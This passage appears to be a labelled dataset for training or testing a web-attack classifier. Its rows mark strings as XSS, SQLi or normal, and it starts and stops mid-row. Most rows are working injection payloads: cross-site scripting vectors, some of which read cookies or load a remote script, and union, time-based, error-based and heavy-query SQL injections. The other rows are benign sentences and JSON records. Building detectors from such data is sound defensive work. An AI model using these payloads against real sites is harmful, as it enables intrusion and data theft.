1510,1510 ) --",2,SQLi,16524 Select song.,3,normal,23070 "<slot draggable=""true"" ondrag=""alert(1)"">test</slot>",1,XSS,5111 "{""id"":null,""name"":""Kadabra""}",3,normal,27557 "{""id"":null,""name"":""Snivy""}",3,normal,27310 It is for you to select a person who you wish to occupy and use the croft in your absence.,3,normal,25971 <main onpointerup=alert(1)>XSS</main>,1,XSS,8715 "javascript://'//"" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*",1,XSS,1765 "1 ) ) ) union all select null,null,null,null,null--",2,SQLi,18283 select ( case when ( 3863 = 1151 ) then 3863 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13571 "1' ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( 'bacm' = 'bacm",2,SQLi,11560 "1%' ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15093 <tt onfocusout=alert(1) tabindex=1 id=x></tt><input autofocus>,1,XSS,3226 "<style>:target {transform: rotate(180deg);}</style><plaintext id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></plaintext>",1,XSS,528 Select a topic for your presentation.,3,normal,24151 "-1166' ) ) as icdz where 1042 = 1042 union all select 1042,1042,1042,1042,1042#",2,SQLi,15275 "1"" union all select null,null,null,null--",2,SQLi,19354 -6890' ) ) or 5771 = 7721--,2,SQLi,20886 "1 ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 3326 = 3326",2,SQLi,12115 "<optgroup oncontextmenu=""alert(1)"">test</optgroup>",1,XSS,5657 "<link onclick=""alert(1)"">test</link>",1,XSS,8887 "<multicol onmousedown=""alert(1)"">test</multicol>",1,XSS,6061 "-2246"" ) ) union all select 4613,4613,4613,4613,4613,4613#",2,SQLi,17367 <caption onpointerleave=alert(1)>XSS</caption>,1,XSS,6344 "1"" ) where 5129 = 5129 order by 1--",2,SQLi,20041 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual--",2,SQLi,14021 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))",2,SQLi,17458 "<rp onmousemove=""alert(1)"">test</rp>",1,XSS,8785 "<map ondblclick=""alert(1)"">test</map>",1,XSS,8714 "<spacer onbeforecopy=""alert(1)"" contenteditable>test</spacer>",1,XSS,3382 "<title onbeforecopy=""alert(1)"" contenteditable>test</title>",1,XSS,3678 "<basefont onmouseleave=""alert(1)"">test</basefont>",1,XSS,5778 How did you select characters from the many people you met?,3,normal,26087 <summary onpointerdown=alert(1)>XSS</summary>,1,XSS,6576 1%' ) ) ) order by 1#,2,SQLi,21594 "<style>@keyframes x{}</style><param style=""animation-name:x"" onanimationend=""alert(1)""></param>",1,XSS,1609 "RLIKE SLEEP(5) AND 1337"" LIKE ""1337",2,SQLi,20018 "{""id"":null,""firstName"":""Mona"",""lastName"":""Lim"",""address"":""81A Geylang Road 02-02"",""city"":""888"",""telephone"":""1343899924""}",3,normal,27295 Insert contact.,3,normal,23061 "{""id"":null,""firstName"":""Florence"",""lastName"":""Ong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27617 "-3298 union all select 7618,7618,7618,7618,7618,7618,7618,7618,7618,7618#",2,SQLi,15907 "1' ) where 9381 = 9381 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,17199 <script ~~~>alert(0%0)</script ~~~>,1,XSS,8987 "1"" and sleep ( 5 ) and ""tdid"" like ""tdid",2,SQLi,19464 "-4811' ) ) ) union all select 4603,4603,4603,4603,4603,4603,4603,4603,4603--",2,SQLi,15546 <content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus>,1,XSS,1982 "1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'edcm' like 'edcm",2,SQLi,11449 "-6335"" ) ) ) union all select 3654--",2,SQLi,20006 "select * from users where id = 1 or ""{1"" = 1 or 1 = 1 -- 1",2,SQLi,17341 "1 ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12179 "1, ( select ( case when ( 1609 = 1609 ) then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases ) end ) )",2,SQLi,12881 "<title onmouseover=""alert(1)"">test</title>",1,XSS,7427 "<p onbeforecut=""alert(1)"" contenteditable>test</p>",1,XSS,5628 "<style>@keyframes x{}</style><menu style=""animation-name:x"" onanimationend=""alert(1)""></menu>",1,XSS,1684 "1"" ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16157 "1"" ) as ypfa where 6128 = 6128",2,SQLi,20589 ") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337",2,SQLi,16359 "<select oncontextmenu=""alert(1)"">test</select>",1,XSS,6448 -3598 ) union all select 2264#,2,SQLi,20526 "<div draggable=""true"" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody>",1,XSS,990 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) #",2,SQLi,15107 "1"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( ""vfoh"" = ""vfoh",2,SQLi,11669 "1"" ) where 6679 = 6679 rlike sleep ( 5 ) #",2,SQLi,19304 1 uni/**/on select all from where,2,SQLi,20186 ‘ or 1 = 1 --,2,SQLi,22073 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i",2,SQLi,11746 "<datalist draggable=""true"" ondragend=""alert(1)"">test</datalist>",1,XSS,3095 ")) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19563 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( 1491 = 1491",2,SQLi,13285 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( '%' = '",2,SQLi,14022 "1%' ) ) ) union all select null,null,null,null,null#",2,SQLi,18231 "{""id"":null,""firstName"":""Qin"",""lastName"":""Bo"",""address"":""450 Bukit Panjang Ring Road #01-595"",""city"":""787"",""telephone"":""3369841993""}",3,normal,27118 "1 ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17506 "1%' ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( '%' = '",2,SQLi,10420 "<fieldset draggable=""true"" ondragleave=""alert(1)"">test</fieldset>",1,XSS,2846 <br onpointerdown=alert(1)>XSS</br>,1,XSS,9081 <listing id=x tabindex=1 onbeforeactivate=alert(1)></listing>,1,XSS,3344 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#",2,SQLi,16446 "<img src=x onerror=\x09""javascript:alert(1)"">",1,XSS,6543 "{""id"":null,""name"":""molecular explanation""}",3,normal,26931 "select * from generate_series ( 1431,1431,case when ( 1431 = 7822 ) then 1 else 0 end ) limit 1--",2,SQLi,14312 "While their inventory consists of newer cards, such as the 2010 Topps series, they offer select vintage memorabilia and collectibles.",3,normal,25133 "<bgsound draggable=""true"" ondragend=""alert(1)"">test</bgsound>",1,XSS,3358 "1%' ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13049 "-8614' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11769 "-9180"" or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11825 "1' ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'pgyl' = 'pgyl",2,SQLi,14438 <script\x09>javascript:alert(1)</script>,1,XSS,7816 "{""id"":null,""name"":""Mink""}",3,normal,27255 Select jog.,3,normal,24646 "1"" ) where 9062 = 9062",2,SQLi,21541 "<a href=""\x00javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2430 1' ) where 3893 = 3893,2,SQLi,21458 "1"" where 2452 = 2452",2,SQLi,21761 The service is only available for select clients at the time.,3,normal,25381 "1"" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,11963 -3821' ) or 9323 = 9323#,2,SQLi,21226 Select your sign.,3,normal,24902 "1%' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( '%' = '",2,SQLi,17094 "<image onkeyup=""alert(1)"" contenteditable>test</image>",1,XSS,4801 Let's discuss where to go for the team outing.,3,normal,23863 "<;SCRIPT a="";blah""; ';'; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,2355 Select a chair.,3,normal,22779 1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and 'dgvg' = 'dgvg,2,SQLi,16402 "1' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11407 "1"" ) ) ) and 9198 = 9198--",2,SQLi,20983 Select stay.,3,normal,24639 x' AND 1=(SELECT COUNT(*) FROM tabname); --,2,SQLi,19160 "<a onmouseleave=""alert(1)"">test</a>",1,XSS,9080 <button onMouseDown=javascript:alert(1)>,1,XSS,8076 "1"" ) ) as swix where 2459 = 2459 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,14883 1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'zhhf' like 'zhhf,2,SQLi,17448 "{""id"":null,""name"":""memory""}",3,normal,26977 "<keygen onmouseup=""alert(1)"">test</keygen>",1,XSS,7494 if ( 2695 = 9045 ) select 2695 else drop function qmno--,2,SQLi,17673 "1 where 5859 = 5859 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12795 "After that, only a select group of websites, including instantwatcher.",3,normal,26404 `'><script>\x09javascript:alert(1)</script>,1,XSS,7062 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( 'xiyl' like 'xiyl",2,SQLi,13531 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( ( '%' = ',2,SQLi,16685 "<form><button formaction=""javascript:alert(XSS)"">lol",1,XSS,5086 <del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus>,1,XSS,2384 <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+,1,XSS,573 "<style>:target {color:red;}</style><b id=x style=""transition:color 1s"" ontransitionend=alert(1)></b>",1,XSS,1437 "1' or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13305 "<h1 onclick=""alert(1)"">test</h1>",1,XSS,9442 1' where 1557 = 1557,2,SQLi,21767 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i",2,SQLi,11742 1 ) ) as sipp where 1999 = 1999 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,14773 "1' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and 'eovg' like 'eovg",2,SQLi,10730 "<a draggable=""true"" ondragstart=""alert(1)"">test</a>",1,XSS,5447 "<style>:target {color: red;}</style><abbr id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></abbr>",1,XSS,1009 "<var draggable=""true"" ondragstart=""alert(1)"">test</var>",1,XSS,4545 "1' where 5023 = 5023 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13011 "<address onmouseup=""alert(1)"">test</address>",1,XSS,7012 "<xss ondblclick=""alert(1)"" autofocus tabindex=1 style=display:block>test</xss>",1,XSS,2066 "<style>:target {color: red;}</style><rt id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></rt>",1,XSS,1138 "=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*",2,SQLi,9885 1' where 1623 = 1623,2,SQLi,21758 1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'nxkp' like 'nxkp,2,SQLi,10201 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></dt>",1,XSS,296 Up to 80% off select furniture and decor (through August 22).,3,normal,25206 "1%' union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,16101 """+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*",2,SQLi,18811 >/KinG-InFeT.NeT/><script>alert(document.cookie)</script>,1,XSS,4000 "onerror=alert()1 a=""",1,XSS,9769 "<image onbeforecopy=""alert(1)"" contenteditable>test</image>",1,XSS,3743 "1' ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11724 Autonomous weapons select and fire on targets without human intervention.,3,normal,26342 "perl -e ';print "";<;IM SRC=java\0script:alert("";XSS"";)>"";;';>; out",1,XSS,2721 "But it is only a select minority who attain to the rank of heroes after death, only the distinguished men of the past.",3,normal,26313 "1"" ) ) as duny where 3756 = 3756 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12737 "1 ) ) as qgok where 3993 = 3993 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,14894 1 or sleep(__TIME__)#,2,SQLi,21565 "1 ) ) as oqfr where 6426 = 6426 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,16394 "<optgroup draggable=""true"" ondragstart=""alert(1)"">test</optgroup>",1,XSS,2810 "<h1 ondblclick=""alert(1)"">test</h1>",1,XSS,9020 "-6112"" ) union all select 8203,8203,8203,8203,8203,8203,8203--",2,SQLi,16964 "select * from users where id = 1 or $+<1 union select 1,@@VERSION -- 1",2,SQLi,16130 Plant a shady tree.,3,normal,22576 -1479%' or 5201 = 3398--,2,SQLi,21210 <img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus>,1,XSS,2471 "<frameset oncopy=""alert(1)"" contenteditable>test</frameset>",1,XSS,3740 select pg_sleep ( 5 ) -- ojzt,2,SQLi,20697 "1' or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13505 "1"" union all select null,null,null,null,null#",2,SQLi,19012 "<style>@keyframes slidein {}</style><source style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></source>",1,XSS,364 "<element onmouseup=""alert(1)"">test</element>",1,XSS,6927 "-5245' or elt ( 1032 = 1032,3623 ) and 'qfvo' = 'qfvo",2,SQLi,18112 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#",2,SQLi,14712 <header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus>,1,XSS,2141 "1"" ) where 9962 = 9962 and 4595 = 4595#",2,SQLi,19647 "1"" where 8672 = 8672 union all select null,null#",2,SQLi,18791 <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>,1,XSS,7317 1 ) as vqdh where 1603 = 1603,2,SQLi,20722 &lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,1314 "1 ) and elt ( 4249 = 4249,7259 )",2,SQLi,20338 <datalist onpointerover=alert(1)>XSS</datalist>,1,XSS,6185 "1"" ) ) as nlgn where 3834 = 3834 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11327 "<style>@keyframes x{}</style><time style=""animation-name:x"" onanimationstart=""alert(1)""></time>",1,XSS,1593 "{""id"":null,""name"":""Horsea""}",3,normal,26799 1%' ) ) ) waitfor delay '0:0:5' and ( ( ( '%' = ',2,SQLi,18570 "<svg xmlns=http://www.w3.org/2000/svg"" onload=""alert(document.domain)""/>",1,XSS,2398 "-1269"" union all select 8412,8412,8412,8412,8412,8412,8412,8412--",2,SQLi,16725 1 ) where 8433 = 8433 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,14583 "?clickTAG=javascript:alert(1)"",",1,XSS,9519 "<small oncut=""alert(1)"" contenteditable>test</small>",1,XSS,5235 Merck's PM approach to select patients may have made the difference.,3,normal,25883 -7442 ) or 3391 = 7492,2,SQLi,21483 1 ) ) as xlww where 5844 = 5844,2,SQLi,20445 <isindex/autofocus/onfocus=alert()>,1,XSS,8990 "<picture draggable=""true"" ondragleave=""alert(1)"">test</picture>",1,XSS,3022 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,9907 "<pre onmouseenter=""alert(1)"">test</pre>",1,XSS,8231 <col onpointerup=alert(1)>XSS</col>,1,XSS,9108 "select dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 70 ) ||chr ( 106 ) ||chr ( 78 ) ,5 ) from dual--",2,SQLi,13937 "`""'><img src=xxx:x \x0Bonerror=javascript:alert(1)>",1,XSS,5297 "<image src=""javascript:alert(2)""> // IE6, O10.10↓, OM10.0↓",1,XSS,3974 -2951 or 4189 = 2291,2,SQLi,21785 1'+ ( select ukwc where 3008 = 3008 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14687 "<span draggable=""true"" ondragstart=""alert(1)"">test</span>",1,XSS,4135 "<style>:target {color: red;}</style><slot id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></slot>",1,XSS,976 <x oncontextmenu=alert(1)>right click this!,1,XSS,7294 "-5170' ) ) as ovbf where 4833 = 4833 union all select 4833,4833,4833,4833--",2,SQLi,15609 "-8266%' ) union all select 8626,8626,8626,8626,8626,8626--",2,SQLi,17362 expression(alert('')),1,XSS,9755 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( '%' = '",2,SQLi,13798 Find data where available.,3,normal,23307 "<tfoot oncopy=""alert(1)"" contenteditable>test</tfoot>",1,XSS,5018 "1%"" union all select null,null,null,null,null,null,null#",2,SQLi,17626 "1', ( select ( case when ( 8640 = 8640 ) then ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null ) ) ) else 8640/ ( select 0 from information_schema.system_users ) end ) from information_schema.system_users ) --",2,SQLi,10898 Where did you find that calming garden?,3,normal,23916 select ( case when ( 2294 = 3651 ) then 2294 else 2294* ( select 2294 from information_schema.character_sets ) end ) #,2,SQLi,13263 select * from users where id = 1 or \<1 or 1 = 1 -- 1,2,SQLi,18048 "-1422%"" ) or make_set ( 9539 = 9519,9519 ) and ( ""%"" = """,2,SQLi,17698 "1 ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( 5621 = 5621",2,SQLi,11897 "1 ) where 9645 = 9645 union all select null,null,null--",2,SQLi,17788 "<audio id=x controls onfocusin=alert(1) id=x><source src=""validaudio.wav""></audio>",1,XSS,1935 "<code onkeydown=""alert(1)"" contenteditable>test</code>",1,XSS,4677 "-7482%"" ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,10246 "<div draggable=""true"" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong>",1,XSS,894 <!ATTLIST xsl:stylesheet id ID #REQUIRED>]>,1,XSS,7290 1' ) ) or sleep ( 5 ) #,2,SQLi,21291 "<cite onmouseover=""alert(1)"">test</cite>",1,XSS,7909 Select upgrade.,3,normal,24620 "1' where 6795 = 6795 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14575 Let's decide where to go for our next adventure.,3,normal,23738 "The county voters were the freeholders; but in the towns, with some important exceptions, the electors were the richer inhabitants who formed the corporations of the boroughs, or a body of select householders more or less under the control of some neighboring landowner.",3,normal,25469 "-9382' ) union all select 4774,4774,4774,4774--",2,SQLi,18874 <dialog onpointerup=alert(1)>XSS</dialog>,1,XSS,7660 -9840' ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'dzlp' = 'dzlp,2,SQLi,10130 select case when 3661 = 9315 then 1 else null end--,2,SQLi,18321 "1"" ) as qmtx where 5280 = 5280 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11386 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'gsup' = 'gsup",2,SQLi,13856 1 ) ) ) or sleep ( 5 ) and ( ( ( 2209 = 2209,2,SQLi,19144 &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;,1,XSS,728 <marquee onpointerup=alert(1)>XSS</marquee>,1,XSS,7217 <link onpointermove=alert(1)>XSS</link>,1,XSS,8248 "-7296%' ) ) ) union all select 9322,9322,9322,9322--",2,SQLi,18204 "1' ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,15900 "1%"" ) ) ) union all select null#",2,SQLi,20253 "1"" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )",2,SQLi,14223 Select the wine.,3,normal,22828 "1%"" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ""%"" = """,2,SQLi,10769 "select * from users where id = 1 or ""@;"" = 1 or 1 = 1 -- 1",2,SQLi,17344 1'|| ( select 'omeg' from dual where 4751 = 4751,2,SQLi,18673 "AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND 1337""=""1337",2,SQLi,17232 <source onpointerover=alert(1)>XSS</source>,1,XSS,7277 "1%"" and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ""%"" = """,2,SQLi,11617 "<div draggable=""true"" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp>",1,XSS,1391 "<multicol draggable=""true"" ondrag=""alert(1)"">test</multicol>",1,XSS,3566 "<b onmouseenter=""alert(1)"">test</b>",1,XSS,9079 <br id=x tabindex=1 onbeforeactivate=alert(1)></br>,1,XSS,5431 "{""id"":null,""firstName"":""Han Jie"",""lastName"":""Kwong"",""address"":""10 Anson Road, #21-02, International Plaza"",""city"":""358"",""telephone"":""4302411445""}",3,normal,27454 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--",2,SQLi,16244 Select the ideal gift for someone special.,3,normal,24253 1' or sleep ( 5 ),2,SQLi,22105 "-4972' ) ) as kfzc where 8817 = 8817 union all select 8817,8817,8817,8817,8817,8817--",2,SQLi,14923 Select the perfect outfit.,3,normal,24304 "1%' ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15536 "-8153' where 2436 = 2436 union all select 2436,2436,2436,2436,2436,2436,2436,2436,2436,2436#",2,SQLi,14585 "<img """"""><script>alert(""XSS by \nxss"")</script><marquee><h1>XSS by xss</h1></marquee>",1,XSS,1870 <menu onpointerover=alert(1)>XSS</menu>,1,XSS,8205 I need to select the right music for the occasion.,3,normal,23912 "<style>:target {color: red;}</style><footer id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></footer>",1,XSS,808 <textarea onbeforepaste=alert(1) autofocus></textarea>,1,XSS,4807 "{""id"":null,""name"":""refused""}",3,normal,26878 "1"" ) as rqpp where 9383 = 9383 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12284 Double Fun will screen in select theaters tonight (September 24th) only.,3,normal,26234 "{""id"":null,""firstName"":""Jerome"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27565 "-8410"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""xhzr"" = ""xhzr",2,SQLi,10450 "<iframe src=""javascript:alert(1)"">",1,XSS,9158 Where's the best place to capture the sunset?,3,normal,23937 Select wisely.,3,normal,24482 "select * from users where id = 1 +1<@ union select version ( ) ,version ( ) -- 1",2,SQLi,15176 "<span onkeypress=""alert(1)"" contenteditable>test</span>",1,XSS,4496 <blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus>,1,XSS,2634 1'|| ( select 'sdll' where 5074 = 5074 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) ) ||',2,SQLi,14310 "Mr. Miakhel said the Taliban were demanding that the government select only health officials recommended by their insurgent movement, and that they select the locations of any new clinics.",3,normal,25879 They are often habitual readers and they typically select professions on the basis of how much potential for growth they offer.,3,normal,25322 Select your switch.,3,normal,25049 <;/script>;<;script>;alert(1)<;/script>;,1,XSS,7835 "-5903%"" ) ) ) or 3038 = 3038",2,SQLi,20800 "select * from generate_series ( 1134,1134,case when ( 1134 = 4909 ) then 1 else 0 end ) limit 1--",2,SQLi,14293 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></template>",1,XSS,147 Filter the posts,3,normal,22893 "&lt;A HREF=\""http&#58;//0102&#46;0146&#46;0007&#46;00000223/\""&gt;XSS&lt;/A&gt;",1,XSS,2035 Select your investigate.,3,normal,24993 "<div draggable=""true"" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style>",1,XSS,1167 "-9011"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11716 <isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus>,1,XSS,2052 "1%"" ) union all select null,null--",2,SQLi,20168 "1' ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( 'rbhe' = 